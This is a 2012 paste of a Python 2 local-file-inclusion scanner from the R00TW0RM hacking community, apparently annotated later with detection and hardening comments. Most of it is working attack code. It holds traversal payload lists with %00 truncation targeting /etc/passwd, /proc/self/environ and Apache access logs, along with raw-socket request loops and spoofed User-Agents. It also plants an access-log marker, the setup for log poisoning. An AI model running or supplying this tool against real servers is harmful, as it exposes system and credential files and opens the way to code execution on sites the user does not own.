scan ver 1.1.py

parkdream1 Apr 25th, 2012 402 Never
  1. #!/usr/bin/python
  2. # Author: parkdream1
  3. # Messenger: h3x4r
  4. # (c) R00TW0RM - Private Community
  5. # https://r00tw0rm.com/
  6. # Local File Include Scaner Ver. 1.1
  7. # Greets: To all members of r00tw0rm !!
  8.  
  9. import socket,sys,re,random,time,httplib
  10. from random import choice
  11.  
# Candidate include paths for /etc/passwd, in probe order: the absolute path,
# then 1 to 13 leading "../" segments, and the same fourteen again with a
# trailing "%00".
# Detection: a request whose path or query string carries a run of "../"
# segments ending in "etc/passwd", with or without "%00", matches this list.
# The "%00" variants target NUL-byte truncation of a suffix appended by the
# application; PHP has rejected NUL bytes in file paths since 5.3.4.
passwd = list(
    ("../" * depth + "etc/passwd" if depth else "/etc/passwd") + suffix
    for suffix in ("", "%00")
    for depth in range(14)
)
  40.  
# Candidate include paths for /proc/self/environ, in probe order: the
# absolute path, then 1 to 14 leading "../" segments, and the same fifteen
# again with a trailing "%00".
# Detection: any request that names "proc/self/environ" behind a run of "../"
# segments matches this list; a legitimate web request has no reason to
# reference that file.
environ = list(
    ("../" * depth + "proc/self/environ" if depth else "/proc/self/environ") + suffix
    for suffix in ("", "%00")
    for depth in range(15)
)
  71.  
# Candidate include paths for six common Apache access-log locations. For
# each location the order is: absolute path, then 1 to 14 leading "../"
# segments, followed by the same fifteen with a trailing "%00" (30 entries
# per location, 180 in total).
# Hardening: the web application's user should not be able to read these
# files at all, and request parameters should never reach an include path.
logs = list(
    ("../" * depth + log_path if depth else "/" + log_path) + suffix
    for log_path in (
        "usr/local/apache2/logs/access_log",
        "var/log/apache2/access.log",
        "var/log/httpd/access_log",
        "var/log/httpd-access.log",
        "var/www/logs/access_log",
        "var/apache2/logs/access_log",
    )
    for suffix in ("", "%00")
    for depth in range(15)
)
# The listing ends the deepest "%00" entry for var/www/logs/access_log in
# "%0" instead of "%00"; that entry is kept as published so the list stays
# identical to the original.
logs[149] = logs[149][:-1]
  252.                
# Fixed pool of ten browser-like User-Agent strings.
# Detection: the pool is static, and its first entry is malformed
# ("WIndows", doubled closing parenthesis), so an exact match on it is a
# usable log signature for this script.
user = [
    "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)",
    "Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
    "Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
    "Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)",
    "Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11",
    "Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11",
    "Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11",
]

# Picked once at module load, so every request of a run carries the same
# User-Agent value.
agent = choice(user)
  265.  
def scanpasswd():
    """Request each entry of `passwd` appended to the target path; stop at the first hit.

    Reads the module globals `target`, `port`, `path` and `agent`. For every
    candidate a new TCP connection is opened, an HTTP/1.0 GET is written by
    hand, and the whole response is read until the peer closes. A response
    containing "root:x:0:0:" is reported as a hit.

    What a defender sees: one HTTP/1.0 GET per second from the same client,
    each with a longer "../" prefix, all with the same User-Agent.

    The process exits with status 1 both on a hit and on any socket error, so
    the exit code does not tell the two apart. The match runs over the raw
    response, headers included.
    """
    for candidate in passwd:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((target, port))
            # Request line, Host and User-Agent are written as three sends.
            sock.send("GET /" + path + candidate + " HTTP/1.0\r\n")
            sock.send("Host: " + target + "\r\n")
            sock.send("User-Agent: " + agent + "\r\n\r\n")
            print "[*] Send Request Success"
            print "http://" + target + "/" + path + candidate
            # HTTP/1.0 without keep-alive: read until recv() returns nothing.
            received = []
            while True:
                chunk = sock.recv(1024)
                if not len(chunk):
                    break
                received.append(chunk)
            fullpage = "".join(received)
            sock.close()
        except Exception, e:
            print "[-] Cant Not Send Request"
            print e
            sys.exit(1)
        # The root entry of a shadowed passwd file is the hit marker.
        if re.search("root:x:0:0:", fullpage):
            print "\033[32m[*] Request Vulnerability\n"
            sys.exit(1)
        print "[-] Request Is Not Vulnerability\n"
        time.sleep(1)
  293.  
def scanenviron():
    """Request each entry of `environ` appended to the target path; stop at the first hit.

    Reads the module globals `target`, `port`, `path` and `agent`. Each
    candidate gets its own TCP connection and a hand-written HTTP/1.0 GET;
    the response is read until the peer closes. A response containing
    "HTTP_HOST" is reported as a hit (presumably because the environment of a
    CGI-style handler carries the request variables; the code only checks for
    the literal string).

    The process exits with status 1 both on a hit and on any socket error.
    The match runs over the raw response, headers included, so a page that
    merely prints "HTTP_HOST" would also be reported.
    """
    for candidate in environ:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((target, port))
            sock.send("GET /" + path + candidate + " HTTP/1.0\r\n")
            sock.send("Host: " + target + "\r\n")
            sock.send("User-Agent: " + agent + "\r\n\r\n")
            print "[*] Send Request Success"
            print "http://" + target + "/" + path + candidate
            # Read until recv() returns nothing, i.e. the server closed.
            received = []
            while True:
                chunk = sock.recv(1024)
                if not len(chunk):
                    break
                received.append(chunk)
            fullpage = "".join(received)
            sock.close()
        except Exception, e:
            print "[-] Cant Not Send Request"
            print e
            sys.exit(1)
        if re.search("HTTP_HOST", fullpage):
            print "\033[32m[*] Request Vulnerability\n"
            sys.exit(1)
        print "[-] Request Is Not Vulnerability\n"
        time.sleep(1)
  321.  
def scanlogs():
    """Request each entry of `logs` appended to the target path; stop at the first hit.

    Reads the module globals `target`, `port`, `path` and `agent`. Before the
    loop, one "HEAD /" request is sent through httplib to `target` on
    httplib's default port (`port` is not passed); its response is never read
    and the connection is never closed. Each candidate is then fetched over
    its own TCP connection with a hand-written HTTP/1.0 GET, and a response
    containing "HEAD / HTTP/1.1" is reported as a hit, i.e. the access log
    came back in the page.

    Why it matters to a defender: access logs hold client-supplied text, so
    a log that can be pulled in through an include parameter is a serious
    finding. Keep log files unreadable by the web application's user.

    The process exits with status 1 both on a hit and on any socket error.
    """
    # Leaves a recognisable request line in the server's access log.
    marker = httplib.HTTPConnection(target)
    marker.request("HEAD", "/")
    for candidate in logs:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((target, port))
            sock.send("GET /" + path + candidate + " HTTP/1.0\r\n")
            sock.send("Host: " + target + "\r\n")
            sock.send("User-Agent: " + agent + "\r\n\r\n")
            print "[*] Send Request Success"
            print "http://" + target + "/" + path + candidate
            # Read until recv() returns nothing, i.e. the server closed.
            received = []
            while True:
                chunk = sock.recv(1024)
                if not len(chunk):
                    break
                received.append(chunk)
            fullpage = "".join(received)
            sock.close()
        except Exception, e:
            print "[-] Cant Not Send Request"
            print e
            sys.exit(1)
        # The marker request line showing up in the body means the log was included.
        if re.search("HEAD / HTTP/1.1", fullpage):
            print "\033[32m[*] Request Vulnerability\n"
            sys.exit(1)
        print "[-] Request Is Not Vulnerability\n"
        time.sleep(1)
  351.  
def menu():
    """Print the scan menu, read a choice from stdin and run the matching scan.

    Choices "1" to "3" run scanpasswd(), scanenviron() or scanlogs() and then
    exit; "4" exits straight away. Every path exits with status 1. Any other
    input prints an error and shows the menu again.
    """
    while True:
        print "Menu:\n"
        print "ID [1]"
        print "[Scan /etc/passwd File]\n"
        print "ID [2]"
        print "[Scan Environ File]\n"
        print "ID [3]"
        print "[Scan Access Logs File]\n"
        print "ID [4]"
        print "[Exit]\n"
        selected = raw_input("[*] Select ID For Start Scanner :")
        if selected == "1":
            print "Scan /etc/passwd File Starting ...\n"
            scanpasswd()
            sys.exit(1)
        elif selected == "2":
            print "Scan /proc/self/environ File Starting ...\n"
            scanenviron()
            sys.exit(1)
        elif selected == "3":
            print "Scan Access Logs File Starting ...\n"
            scanlogs()
            sys.exit(1)
        elif selected == "4":
            print "Exiting..."
            sys.exit(1)
        # Unrecognised input: report it and loop back to the menu.
        print "Unknow Command\n"
        print "Please rechoice ID\n"
  382.  
def banner():
    """Print the start-up banner, including the module globals `target` and `port`."""
    rule = "****************************************************************************"
    rows = (
        "\n",
        rule,
        "||                         Local File Include Scaner Ver. 1.1             ||",
        "||                                 by parkdream1                          ||",
        "||                        (c) R00TW0RM - Private Community                ||",
        "                    Fucking from "+target+" on port "+str(port),
        rule,
        "\n",
    )
    for row in rows:
        print row
  392.  
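if __name__ == '__main__':
    # Exactly three positional arguments are required: host, port, and the
    # URL path (including the query parameter) that the candidates are
    # appended to.
    if len(sys.argv) != 4:
        # Both help lines go to stderr; the original sent only the first
        # there. The example host is the reserved name example.com rather
        # than a real third-party site.
        print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
        print >>sys.stderr, "Example: python", sys.argv[0], "example.com 80 "+'"index.php?src="'
        sys.exit(1)

    # These three names are module globals read by banner() and the scan
    # functions. int() raises ValueError on a non-numeric port.
    target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]

    banner()
    menu()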